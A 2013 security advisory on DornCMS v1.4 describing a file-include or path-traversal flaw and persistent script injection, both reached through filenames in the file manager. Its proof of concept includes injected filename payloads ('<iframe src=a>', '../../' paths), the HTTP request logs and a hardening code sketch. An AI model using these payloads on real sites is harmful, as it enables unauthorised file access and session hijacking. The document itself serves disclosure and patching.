Document Title:
===============
DornCMS Application v1.4 - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1113


Release Date:
=============
2013-10-14


Vulnerability Laboratory ID (VL-ID):
====================================
1113


Common Vulnerability Scoring System:
====================================
6.6


Product & Service Introduction:
===============================
This is a simple, easy to use, PHP Content Management System that is geared toward personal or
informational websites with minimal interactivity.

(Copy of the Homepage: http://sourceforge.net/projects/dorncms/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the DornCMS v1.4 web-application.


Vulnerability Disclosure Timeline:
==================================
2013-10-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
SourceForge
Product: DornCMS - Web Application 1.4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
A local file include and a POST injection vulnerability have been detected in the Dorn Content Management System v1.4 web-application.
The file include web vulnerability allows remote attackers to inject file paths with malicious content via the POST method.

The vulnerability is located in the Browse File section of the `Upload` module. Remote attackers are able to manipulate
the filename value in the upload POST request. Code or commands supplied as the filename are executed in the file directory
listing of the index module. During exploitation the attacker can combine the script code injection with a file/path
request to gain unauthorized access.

Exploitation of the local file include web vulnerability requires no user interaction or privileged application user
account with password. Successful exploitation of the vulnerability results in unauthorized local file and path requests
that compromise the device or application.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Upload > Browse File

Vulnerable Parameter(s):
[+] filename (name)

Affected Module(s):
[+] File Manager - File Dir Listing


1.2
A persistent input validation web vulnerability has been detected in the Dorn Content Management System v1.4 web-application.
The bug allows a remote attacker to inject malicious script code persistently on the application side of the device.

The vulnerability is located in the file manager module. The file manager module allows the user to add regular files to the
web server. Attackers are able to inject their own malicious script code as the file name by tampering with the upload POST request.
The code executes in the file manager data list in the left bar. After the injection the code is executed permanently, and it is
not possible to delete it via an application function.

Exploitation of the persistent web vulnerability requires low user interaction and a privileged web-application user account.
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account theft via persistent
web attacks, persistent phishing, or stable (persistent) manipulation of the certificate mail notification context.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Add Sub Directory (FileManager)

Vulnerable Parameter(s):
[+] directory - name

Affected Module(s):
[+] File Manager Folder Listing


Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers with a privileged application user account
and without user interaction. For demonstration or to reproduce ...


Vulnerable Module: Upload > Browse File
Affected: Current Directory: files/ name as path value


PoC: Upload > Browse File - files/ Name

<div id="fileinfo_holder">
Current Directory: <span id="current_path">files/</span>
<div id="fileinfo"><table class="standard">
<tbody><tr>
<th class="ui-state-active">
</th><th class="ui-state-active">Name</th>
<th class="ui-state-active">Preview</th>
<th class="ui-state-active">Size</th>
<th class="ui-state-active"> </th>
</tr>
<tr><td><input value="files/<iframe src=a>" type="checkbox"></td>
<td><a href="/dorncms/files/<../../[LOCAL FILE/PATH INCLUDE VULNERABILITY!]>" target="_blank"><iframe src="a"></a></td>
<td style='width: 300px;'><em>no preview</em></td><td>51 kb</td>
<td><a href='/dorncms/cms/delete_file/?name=files%2F%3C<../../[LOCAL FILE/PATH INCLUDE VULNERABILITY!]'
class='ajax_link delete'>delete</a> | <a href='/dorncms/cms/rename_file/?name=files%2F%3C<../../[LOCAL FILE/PATH INCLUDE VULNERABILITY!]"<'
class='ajax_link rename'>rename</a></td></tr></table></iframe></a></td></tr></tbody></table></div></div>


--- PoC Session Request Logs ---
Status: 200[OK]
POST http://dorn.localhost:8080/dorncms/cms/doajaxfileupload/?directory=files/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[46] Mime Type[text/html]

Request Headers:
Host[dorn.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://dorn.localhost:8080/dorncms/cms/upload/file/]
Cookie[__utma=87180614.576957282.1381681699.1381688518.1381691247.5; __utmc=87180614;
__utmz=87180614.1381681699.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
uvts=iexqgvWCEnvk3fI; __gads=ID=510fdc08255814de:T=1381681756:S=ALNI_MZliqnNeNYBzuLMn-8D_tU8PM_Ugg;
__utmb=87180614.6.10.1381691247; PHPSESSID=036s0d3jidrcp2mrapst0uqdb5]
Connection[keep-alive]

Post Data:
POST_DATA[-----------------------------7708139255231
Content-Disposition: form-data; name="fileToUpload"; filename="<<../../[LOCAL FILE/PATH INCLUDE VULNERABILITY!]>"
Content-Type: image/png
‰PNG


Status: 200[OK]
POST http://dorn.localhost:8080/dorncms/cms/filelist/
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ]
Content Size[318]
Mime Type[text/html]

Request Headers:
Host[dorn.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://dorn.localhost:8080/dorncms/cms/upload/file/]
Content-Length[13]
Cookie[__utma=87180614.576957282.1381681699.1381688518.1381691247.5; __utmc=87180614;
__utmz=87180614.1381681699.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
uvts=iexqgvWCEnvk3fI; __gads=ID=510fdc08255814de:T=1381681756:S=ALNI_MZliqnNeNYBzuLMn-8D_tU8PM_Ugg;
__utmb=87180614.6.10.1381691247; PHPSESSID=036s0d3jidrcp2mrapst0uqdb5]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]

Post Data:
path[files%2F]

Response Headers:
Date[Sun, 13 Oct 2013 19:25:57 GMT]
Server[Apache]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[318]
Keep-Alive[timeout=2, max=99]
Connection[Keep-Alive]
Content-Type[text/html]


Status: 200[OK]
GET http://dorn.localhost:8080/dorncms/cms/upload/file/<../../[LOCAL FILE/PATH INCLUDE VULNERABILITY!]
Load Flags[LOAD_DOCUMENT_URI ]
Content Size[20]
Mime Type[text/html]

Request Headers:
Host[dorn.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://dorn.localhost:8080/dorncms/cms/upload/file/]
Cookie[__utma=87180614.576957282.1381681699.1381688518.1381691247.5; __utmc=87180614;
__utmz=87180614.1381681699.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
uvts=iexqgvWCEnvk3fI; __gads=ID=510fdc08255814de:T=1381681756:S=ALNI_MZliqnNeNYBzuLMn-8D_tU8PM_Ugg;
__utmb=87180614.6.10.1381691247; PHPSESSID=036s0d3jidrcp2mrapst0uqdb5]
Connection[keep-alive]

Response Headers:
Date[Sun, 13 Oct 2013 19:25:58 GMT]
Server[Apache]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[20]
Keep-Alive[timeout=2, max=98]
Connection[Keep-Alive]
Content-Type[text/html]


1.2
The persistent web vulnerability can be exploited by remote attackers with a privileged application user account and low
user interaction. For demonstration or to reproduce ...


PoC: Add Sub Directory (File Manager)

<ul class="jqueryFileTree">
<li class="directory"><a href="#" rel="uploadedimages/" id="uploadedimages">images</a>
</li>
<li class="directory"><a class="selected" href="#" rel="files/" id="files">files</a>
<ul class="jqueryFileTree"><li class="directory"><a href="#"
rel="files></a>>"<[PERSISTENT SCRIPT CODE VULNERABILITY!]"<;)<">>"
<<../../x"<;)<">>)<</a></li></ul></li>
</ul></iframe></a></li></ul></li></ul>


--- PoC Session Request Logs ---
Status: 200[OK]
GET http://dorn.localhost:8080/dorncms/cms/folderlist/
Load Flags[LOAD_BACKGROUND ]
Content Size[186]
Mime Type[text/html]

Request Headers:
Host[dorn.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
Referer[http://dorn.localhost:8080/dorncms/cms/upload/file/]
Cookie[__utma=87180614.576957282.1381681699.1381688518.1381691247.5; __utmc=87180614;
__utmz=87180614.1381681699.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
uvts=iexqgvWCEnvk3fI; __gads=ID=510fdc08255814de:T=1381681756:S=ALNI_MZliqnNeNYBzuLMn-8D_tU8PM_Ugg;
__utmb=87180614.5.10.1381691247; PHPSESSID=036s0d3jidrcp2mrapst0uqdb5]
Connection[keep-alive]

Response Headers:
Date[Sun, 13 Oct 2013 19:19:41 GMT]
Server[Apache]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[186]
Keep-Alive[timeout=2, max=98]
Connection[Keep-Alive]
Content-Type[text/html]


Status: 200[OK]
GET http://dorn.localhost:8080/dorncms/cms/upload/file/[PERSISTENT SCRIPT CODE VULNERABILITY!]"<
Load Flags[LOAD_DOCUMENT_URI ]
Content Size[20]
Mime Type[text/html]

Request Headers:
Host[dorn.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://dorn.localhost:8080/dorncms/cms/upload/file/]
Cookie[__utma=87180614.576957282.1381681699.1381688518.1381691247.5; __utmc=87180614;
__utmz=87180614.1381681699.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
uvts=iexqgvWCEnvk3fI; __gads=ID=510fdc08255814de:T=1381681756:S=ALNI_MZliqnNeNYBzuLMn-8D_tU8PM_Ugg;
__utmb=87180614.5.10.1381691247; PHPSESSID=036s0d3jidrcp2mrapst0uqdb5]
Connection[keep-alive]

Response Headers:
Date[Sun, 13 Oct 2013 19:19:41 GMT]
Server[Apache]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[20]
Keep-Alive[timeout=2, max=97]
Connection[Keep-Alive]
Content-Type[text/html]


Solution - Fix & Patch:
=======================
1.1
Restrict the upload function and its input with secure escaping and a clean parse to ensure no execution occurs.
Also filter and parse the main folder name listing where the output is executed.

1.2
The second vulnerability can be patched by securely restricting and encoding the input of the add sub directory function in the file manager module.
Also parse the vulnerable output in the file manager listing, even if the input is already encoded.


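A hardening sketch covering both fixes above, added here as an example and not code from DornCMS or its authors: one whitelist sanitiser for the upload filename (1.1) and the add-sub-directory name (1.2), a root-containment check, and output escaping for the listing where both names are rendered. `sanitize_name`, `inside_root`, `h`, `listing_row` and the listing markup are assumptions modelled on the PoC output.

```php
<?php
// Added example, not DornCMS code: one sanitiser for the upload filename
// (issue 1.1) and the "add sub directory" name (issue 1.2), plus output
// escaping for the listings where both names are rendered. Function names
// and the listing markup are assumptions modelled on the advisory's PoC.

// Accept exactly one safe path component, or reject the request outright.
function sanitize_name(string $raw): ?string {
    // Client-supplied separators or NUL bytes are never legitimate here;
    // refusing them beats silently basename()-ing a "../../" prefix away.
    if (strpbrk($raw, "/\\\0") !== false) {
        return null;
    }
    // Whitelist: no leading dot (covers ".." and dotfiles), nothing that can
    // break out of an HTML attribute, a URL or a query string; \z is strict.
    if (!preg_match('/^[A-Za-z0-9_][A-Za-z0-9._-]{0,127}\z/', $raw)) {
        return null;
    }
    return $raw;
}

// Second line of defence: the resolved target must sit directly under $root.
function inside_root(string $root, string $name): bool {
    $rootReal = realpath($root);
    return $rootReal !== false
        && dirname($rootReal . DIRECTORY_SEPARATOR . $name) === $rootReal;
}

// Escape once, at output time, for both text and quoted attribute contexts.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// One row of the file listing; $dir is server-controlled (e.g. 'files/').
function listing_row(string $dir, string $name): string {
    $query = rawurlencode($dir . $name);           // ?name= in delete/rename links
    return '<tr><td><input value="' . h($dir . $name) . '" type="checkbox"></td>'
         . '<td><a href="/dorncms/' . $dir . rawurlencode($name) . '" target="_blank">'
         . h($name) . '</a></td>'
         . "<td><a href='/dorncms/cms/delete_file/?name=" . $query . "'>delete</a></td></tr>";
}

// Constructed inputs shaped like the advisory's PoC payloads; __DIR__ stands
// in for the upload root so inside_root() can resolve a real directory.
foreach (['report.png', '../../x', '<iframe src=a>', 'files"></a><b>'] as $in) {
    $safe = sanitize_name($in);
    $ok   = $safe !== null && inside_root(__DIR__, $safe);
    echo str_pad($in, 16), ' => ', $ok ? listing_row('files/', $safe) : 'REJECTED', "\n";
}
```

Only `report.png` survives the whitelist; the three PoC-shaped names are rejected before they reach the filesystem or the listing, and the rendered row escapes the surviving name in every attribute and text position.
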
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(+).

1.2
The security risk of the persistent input validation web vulnerability is estimated as medium(+).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website are trademarks of the vulnerability-lab team and the specific authors or managers. To record, list (feed),
modify, use or edit our material, contact admin@vulnerability-lab.com or research@vulnerability-lab.com to get permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]


--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com